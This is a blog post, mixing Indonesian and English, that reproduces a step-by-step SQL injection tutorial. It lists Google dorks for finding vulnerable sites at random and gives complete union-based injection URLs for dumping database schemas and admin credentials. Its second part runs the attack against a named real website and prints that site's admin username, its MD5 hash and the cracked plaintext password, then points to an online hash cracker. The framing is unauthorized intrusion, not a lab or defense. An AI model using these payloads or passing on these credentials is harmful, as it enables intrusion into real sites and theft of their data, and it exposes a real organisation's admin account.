SqLi Tutorial – Sql Injection Tutorial – Sql Injection Artikel – SQL Injection Article
Sqli (alias Sql Injection atau Structured Query Language Injeksi) adalah langkah pertama dalam entri untuk memanfaatkan atau hacking website. Hal ini mudah dilakukan dan merupakan titik dari awal yang bagus. Sayangnya tutorial yang sedikit rumit sehingga itulah sebabnya ane menulis ini. Sqli pada dasarnya hanyalah suntikan pertanyaan ke dalam database atau menggunakan query untuk mendapatkan bypass otorisasi sebagai sebuah admin.
http://www.binushacker.net/wp-content/uploads/sql-injection-tutorial.jpg
Untuk Mencari Inject
Mencari SQLI sangat mudah,semua yang perlu ente2 lakukan adalah Googling . Hal pertama yang perlu ente2 lakukan adalah menemukan beberapa dorks
Code:
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:read.php?id=
"id=" & intext:"Warning: mysql_fetch_assoc()
"id=" & intext:"Warning: mysql_fetch_array()
"id=" & intext:"Warning: mysql_num_rows()
Lebih lengkap, silakan dicari di Google Dorknya :)
PART 1
Pilih salah satu dorks dan menambahkan inurl: sebelum
(Jika mereka belum memiliki itu) dan kemudian salin dan sisipkan
ke google. Pilih salah satu situs dari google dan chek 1-1.
Sebagai contoh url dari halaman ente berada mungkin terlihat seperti ini
Code:
http://www.example.com/index.php?id=3
untuk memeriksa adanya Bug MySQL tinggal tambahin “‘” di akhir URL
contoh
Code:
http://www.example.com/index.php?id=3'
tekan enter sampai ente2 mendapatkan ERROR
Mendapatkan Jumlah Kolom
Setelah ente menemukan situs yg udah di siapin ,langkah pertama yang perlu ente2 ambil adalah untuk menemukan jumlah kolom. Cara termudah untuk melakukannya adalah menggunakan pernyataan “order by”. Yang harus ente lakukan adalah meletakkan ORDER BY (angka) - pada akhir url ente. Jadi seharusnya terlihat seperti ini.
Code:
http://www.example.com/index.php?id=3 ORDER BY (number)--
setelahnya ane ubah jadi bahasa inggris dah..capek translatenya wkwkwkwkwkwkwkwkwkw :p
Lets say on order by 8– you get an error page. This means that the website has 7 columns because it will give you errors on anything over 7. If you have a bad memory you should open notepad andwrite the # of columns you find.
Finding Acsessable Columns
Now that we have the number of columns we need to get the column numbers that we can grab information from. We do this by by using the “Union” “select” and Number of columns. You put them together in your url like this
Code:
http://www.example.com/index.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7--
For the end part of the url, (1,2,3,4,5,6,7) You put the number of columns you found in the first step. Since I found that the site I was testing had 7columns I put 1,2,3,4,5,6,7. Also remeber to put a – infront of the id number. After you do that you should get something like this…
The page should look a bit fucked up and there should be 2 numbers on the page. These two numbers are the colum numbers we can get information from. We will replace them with statements later on so write them down or remeber them.
Finding MySQL Database Version The reasons you need the database name is to see weather or not the website is worth your time because any msql database under 5 you will have to blindly guess the table and column names. If you are a begginer and you find that the database is below 5 I urge you to find
a different site.
Now we take one of the numbers that we found from the step above and replace it with @@version For Example, before our url looked like this
Code:
http://www.example.com/index.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7--
Now since we will replace the 1 with @@version
Code:
http://www.example.com/index.php?id=-3+UNION+SELECT+@@version,2,3,4,5,6,7--
Press enter and now the page should display the database number.
Now the number that we had in the first step will be replaced with the database number. As it shows aboveThe site that I am testing has a version number of 5.0.45. Since this number is 5 or above we will continue working on this site.
Finding Database Names
Next we are going to inject the website to find the database names. We do this by replacing @@version with group_concat(schema_name) and also add + from+information_schema.schemata– after the last number in our url. So now our url should look like this
Code:
http://www.example.com/index.php?id=-3+UNION+SELECT+group_concat(schema_name),2,3,4,5,6,7+ from+information_schema.schemata--
You should get something like this when you go to that url.
This image is hidden for guests. Please login or register to see it.
It will list the database names. Now to find which one is currently in use replace group_concat(schema_name) withconcat(database()) and delete + from+information_schema.schemata So the url should now look like this
Code:
http://www.example.com/index.php?id=-3+UNION+SELECT+concat(database()),2,3,4,5,6,7--
It will display which database which is in use. You may want to write it down.
Finding Table Names
To get table names of current database you need to replace concat (database()) with group_concat (table_name) and add from information_schema.tables where table_schema=database() between the last number and the — also remove the+ signs from the union select. Now your url should look like this
Code:
http://www.example.com/index.php?id=-3 union select group_concat(table_name),2,3,4,5,6,7 from information_schema.tables where table_schema=database()--
The page should now show the Table names. You may want to write them down.
This image is hidden for guests. Please login or register to see it.
Finding Column Names
This is exactly like getting table names you just change table_name to column_name and information_schema.tables to information_schema.columns. So your url should look like.
Code:
http://www.example.com/index.php?id=-3 union select group_concat(column_name),2,3,4,5,6,7 from information_schema.columns where table_schema=database()--
his should give you the column names. You may want to write them down.
Lets say they gave us back the cloumn names
admin_username
admin_password
Getting Information
Now we can have the database name, table names, and colomn names we can put them together and
pull information from them. Do to this we need to put the following in our url.
Code:
http://www.example.com/index.php?id=-3 union select 1, group_concat (columnname,0x3a,columnname,0x3a) ,2,3,4,5,6,7 from databasename.tablename--
Now replace columnname with the column names you want infomation from. The 0x3a will make a : to seperate the information for you. Put as many column names as you want to remeber to stick to the format. Also replace databasename.tablename.With the database name and the table name the column names where in. After all this your url should look something like this.
Code:
http://www.example.com/index.php?id=-3 union select 1,group_concat(admin_username,0x3a,admin_password,0x3a),2,3,4,5,6,7 from whippit.t_admin--
Now you should get usernames and passwords for the admin or what ever information you wanted to get.
Now you should know the basics of sqli. Enjoy! I put alot of work into this tutorial so I hope you guys like it.
If have any questions feel free to pm me or add me on my msn or aim. There are probably a few mistakes in this tutorial, I will fix them when I have time. enjoy all team lmao
Credit: madun | x-habie
PART 2
What Is SQLi? ( SQL injection )
SQL injection is a basic in Webhacking , and its the first way to debute Exploiting sites .
How To Find SQLi Vuln Sites , & Inject Them :
This is very simple , just use this dorks with a SQLi Scanner , Or google then check every site by your self .Now to check manually is a site is SQLi vuln , just add ‘ at the end of the url : For example , we have our target ,
Code:
http://www.cocobod.gh/news_details.php?id=30
Now , we want to check if the is SQLi vuln , so we add ‘ at the end :
Code:
http://www.cocobod.gh/news_details.php?id=30'
If we got an error , that means that he is Vuln : )
So , now we move to next Step .
How To Find Columns Count :
After you have your vuln site , u need to know his columns count , to do it , just add “order by X–” at the end of the URL ,
X is a number from 1 to unlimited :)
For example , we have our target server and we try to count columns ,
We add order by 1– at the end , then order by 2– *etc.. , always increase number till u got an error in your website Like this one :
So , in our target server , we have tryed this :
Code:
http://www.cocobod.gh/news_details.php?id=30 order by 1-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 2-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 3-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 4-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 5-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 6-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 7-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 8-- >> Unknown column
http://www.cocobod.gh/news_details.php?id=30 order by 8– *>> Unknown column
That means that the 5th column does not exist , that means that column count is 7 : D
How to Find The Acsessable Columns :
Now , we now that column count is 4 , next step is to check for acsessable columns , to do that , we use this querie “UNION SELECT number,of,columns–” like this :
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,6,7--
You will get something like this :
Binus Hacker Tutorial
That means that we can get informations from the site from the 6th , the 2nd , and the 3rd column *: D , haha we got the used columns : D .
How To Get MySQL DB Version :
We need to know MySQL DB Version to know if we can exploit this site or not , cox every site that is using MySQL 4.x.x > u can’t work on it , but every 5.x.x or above is exploitable : ) So to know MySQL DB Vesrion , just replace the number of the used column with “@@version”
For example :
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,@@version,7--
Binus Hacker Tutorial
That means that we can continue working on this site .
How To Find Database Name :
Now , we are going to inject the site to know DB Name ,
to do this , replace the used column number with “group_concat(schema_name)” , and add “from information_schema.schemata–” after the last column number , for example :
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(schema_name),7 from information_schema.schemata--
Binus Hacker Tutorial
Now , to use the one the website use , replace “group_concat(schema_name)” with “concat(database())” for Example :
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,concat(database()),7 from information_schema.schemata--
Binus Hacker Tutorial
Congratz , you got the used DB :)
How to Get The Table Names :
Now we need to get Table names , to do this , replace the used column number with “group_concat(table_name)” and add “from information_schema.tables where table_schema=database()–” at the end of columns number .
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(table_name),7 from information_schema.tables where table_schema=database()--
Binus Hacker Tutorial
How To Get Column Names :
To get column names , we will use this queries :
group_concat(column_name)
from information_schema.columns where table_schema=database()–
Example :
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(column_name),7 from information_schema.columns where table_schema=database()--
Binus Hacker Tutorial
How To Get Informations From Columns :
Now , we are in Our Final Step , now we will get the admin infos from column , How to do it?
Simple , Follow this example :
Code:
http://www.site.com/news_details.php?id=30 union select 1,2,3,4,5,group_concat(columusername,0x3a,columnpassword),7 from currentdb.tableused--
So our exploit will be like this :
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(username,0x3a,password),7 from cocobod_gh.coc_admin--
Binus Hacker Tutorial
Now we need to decrypt the password that is crypted in md5 ,
Go to http://www.md5decrypter.co.uk/ past your hash , fill the captcha and clic on decrypt , with a little luck , you Will get the pass like here : )
Binus Hacker Tutorial
comaster:2c39e3769d300f7e23f8a9e1e21773e7
comaster:cocoadmin4682
username : comaster
password : cocoadmin4682
Et voila , we have succelfully injected a website , and got the admin infos : D
Artikel ini dapat copas setelah berpetualang mencari artikel bermanfaat. Silahkan dipelajari ya... ane juga lagi belajar nih wkwkwk :D
Artikel ini dapat copas setelah berpetualang mencari artikel bermanfaat. Silahkan dipelajari ya... ane juga lagi belajar nih wkwkwk :D
Tidak ada komentar:
Posting Komentar